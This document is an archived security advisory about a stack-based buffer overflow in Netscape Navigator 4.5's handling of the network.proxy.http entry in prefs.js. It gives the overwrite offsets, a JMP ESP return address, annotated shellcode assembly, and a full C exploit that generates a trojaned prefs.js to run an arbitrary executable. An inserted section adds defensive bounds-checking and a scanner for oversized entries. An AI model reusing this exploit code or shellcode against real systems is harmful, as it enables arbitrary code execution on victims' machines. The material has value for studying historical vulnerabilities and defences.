COMMAND
Netscape Navigator/Communicator
SYSTEMS AFFECTED
Netscape Navigator/Communicator 4.5
PROBLEM
Steve Fewer found the following. He recently uncovered a stack-based
buffer overflow in NN which allowed him to execute arbitrary code.
It is a local attack where the offending party is the user's
'prefs.js' file, usually stored in
c:\program files\netscape\users\*** where *** is a user.
It occurs when NN reads in an entry greater than 80 bytes in the
network.proxy.http field. Netscape have been notified of this
problem. E.g.
user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC");
The EBP is overrun at bytes 81 - 84 and the EIP is overrun at
bytes 85 - 89; from there on your code can be placed. The first
80 bytes get blown away when you smash the stack, but you are left
with a possible 500 bytes or more for your exploit code (500 was
the most that Steve checked). Your first byte of code is
pointed to by the ESP.
To concoct an exploit for this, to see if it was actually
exploitable, Steve pointed his EIP into a 'JMP ESP' located at
7FD035EB in shell32.dll (v4.72.3110.6), which NN loads. Having got
back to his exploit buffer he simply made it execute a file called
app.exe, which should be located in \windows\command\, and then
made it call exit() to tidy up so we don't cause an access
violation. Obviously there is room for a more insidious exploit,
but the author doesn't view this as an enormously dangerous security
flaw, so it didn't warrant writing anything more sophisticated.
For protection you could try the latest version of NN, which
is 4.7. This was all created/tested on Windows 98 running on an
Intel PII 400 with 128MB RAM.
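The following is an added illustration, not part of Steve Fewer's advisory or code, of the bounds check this overflow is missing: a reader that copies the network.proxy.http value into an 80-byte buffer only when it fits (rejecting it otherwise), plus a scan that counts oversized entries in a prefs.js text, which is a cheap way to check a user's prefs.js for this kind of tampering. The 80-byte buffer size follows the advisory's description, the parsing of user_pref lines is assumed, and the sample prefs.js content is constructed.

```c
#include <string.h>

#define PROXY_BUF 80   /* size of the fixed buffer the advisory describes (assumed) */
#define A10 "AAAAAAAAAA"
/* constructed sample prefs.js: one sane proxy entry and one 90-byte value */
static const char SAMPLE_PREFS[] =
    "user_pref(\"network.proxy.type\", 1);\n"
    "user_pref(\"network.proxy.http\", \"proxy.example\");\n"
    "user_pref(\"network.proxy.http\", \"" A10 A10 A10 A10 A10 A10 A10 A10 A10 "\");\n";

/* Copy the string value of user_pref("<key>", "...") into a bounded buffer.
 * Returns the value length, -1 if the line is not a string pref for that exact
 * key, or -2 if the value would not fit (the check NN 4.5 lacks). Note that a
 * value of exactly PROXY_BUF characters already needs one more byte for the
 * terminator, so it is rejected as well. */
int read_pref_value(const char *line, const char *key, char *out, size_t outsz)
{
    const char *p = strstr(line, "user_pref(");
    if (!p || !(p = strchr(p, '"'))) return -1;
    p++;                                   /* start of the key */
    size_t klen = strlen(key);
    if (strncmp(p, key, klen) != 0 || p[klen] != '"') return -1;   /* other key or prefix */
    if (!(p = strchr(p + klen + 1, '"'))) return -1;               /* non-string value */
    const char *end = strchr(++p, '"');    /* p is now the start of the value */
    if (!end) return -1;
    size_t vlen = (size_t)(end - p);
    if (vlen >= outsz) return -2;          /* would overflow: reject, do not copy */
    memcpy(out, p, vlen);
    out[vlen] = '\0';
    return (int)vlen;
}

/* Scan a whole prefs.js text and count network.proxy.http entries whose value
 * does not fit the buffer; a line too long to parse at all is counted too. */
int count_oversized_proxy_prefs(const char *prefs)
{
    int hits = 0;
    char line[4096], val[PROXY_BUF];
    while (*prefs) {
        const char *nl = strchr(prefs, '\n');
        size_t len = nl ? (size_t)(nl - prefs) : strlen(prefs);
        size_t n = len < sizeof line ? len : sizeof line - 1;
        memcpy(line, prefs, n);
        line[n] = '\0';
        int rc = (n == len) ? read_pref_value(line, "network.proxy.http", val, sizeof val) : -2;
        if (rc == -2) hits++;              /* oversized value, or line too long to parse */
        prefs += len + (nl ? 1 : 0);
    }
    return hits;
}
```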
This is the assembly which runs a file app.exe and then calls
exit() to clean up. The op codes are to the right. Steve called
system() at address 78019824 in msvcrt.dll v6.00.8397.0 to run
app.exe and exit() at address 78005504 in the same DLL to tidy up.
mov esp,ebp // 8BE5
push ebp // 55
mov ebp,esp // 8BEC
xor edi,edi // 33FF
push edi // 57
sub esp,04h // 83EC04
mov byte ptr [ebp-08h],61h // C645F861
mov byte ptr [ebp-07h],70h // C645F970
mov byte ptr [ebp-06h],70h // C645FA70
mov byte ptr [ebp-05h],2Eh // C645FB2E
mov byte ptr [ebp-04h],65h // C645FC65
mov byte ptr [ebp-03h],78h // C645FD78
mov byte ptr [ebp-02h],65h // C645FE65
mov eax, 0x78019824 // B824980178
push eax // 50
lea eax,[ebp-08h] // 8D45F8
push eax // 50
call dword ptr[ebp-0ch] // FF55F4
push ebp // 55
mov ebp,esp // 8BEC
mov edx,0xFFFFFFFF // BAFFFFFFFF
sub edx,0x87FFAAFB // 81EAFBAAFF87
push edx // 52
xor eax,eax // 33C0
push eax // 50
call dword ptr[ebp-04h] // FF55FC
The Exploit:
/* Stack based buffer overflow exploit for Netscape Navigator 4.5
 * Author Steve Fewer, 22-12-99. Mail me at darkplan@oceanfree.net
 *
 * Netscape Navigator causes a buffer overflow when reading from
 * the users "prefs.js" file. If it reads a string longer than 80
 * bytes in the user_pref("network.proxy.http", "proxy.com");
 * field it smashes the stack overwriting the EIP and EBP. This
 * can be used to execute arbitrary code.
 *
 * Tested with Netscape Navigator 4.5 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */
#include <stdio.h>
#include <string.h>
int main()
{
    printf("\n\n\t\t........................................\n");
    printf("\t\t.....Netscape Navigator 4.5 exploit.....\n");
    printf("\t\t........................................\n");
    printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n");
    printf("\t\t.........http://indigo.ie/~lmf..........\n");
    printf("\t\t........................................\n\n");
    // the first 80 bytes. These get blown away when the stack goes down.
    char buff[96];
    // the EBP, we don't need to use it so fill it with B's
    char ebp[8] = "BBBB";
    // we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP @ 7FD035EB
    char eip[8] = "\xEB\x35\xD0\x7F";
    // this is our 'arbitrary code', it just runs a file app.exe from the \WINDOWS\COMMAND directory then calls exit() to clean up
    char sploit[128] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
    FILE *file;
    for(int i=0;i<80;i++)
    {
        buff[i] = 0x90;
    }
    // terminate the 80-byte pad so %s below stops exactly where the EBP bytes begin
    buff[80] = '\0';
    // just create our new, 'trojaned' prefs.js file
    file = fopen("prefs.js","wb");
    if(file == NULL)
    {
        perror("prefs.js");
        return 1;
    }
    // and slap in the nasty sploit
    fprintf(file,"user_pref(\"network.proxy.http\", \"%s%s%s%s\");", buff, ebp, eip, sploit);
    fclose(file);
    printf("\t created file prefs.js loaded with the exploit.\n");
    return 0;
}
SOLUTION
Nothing yet.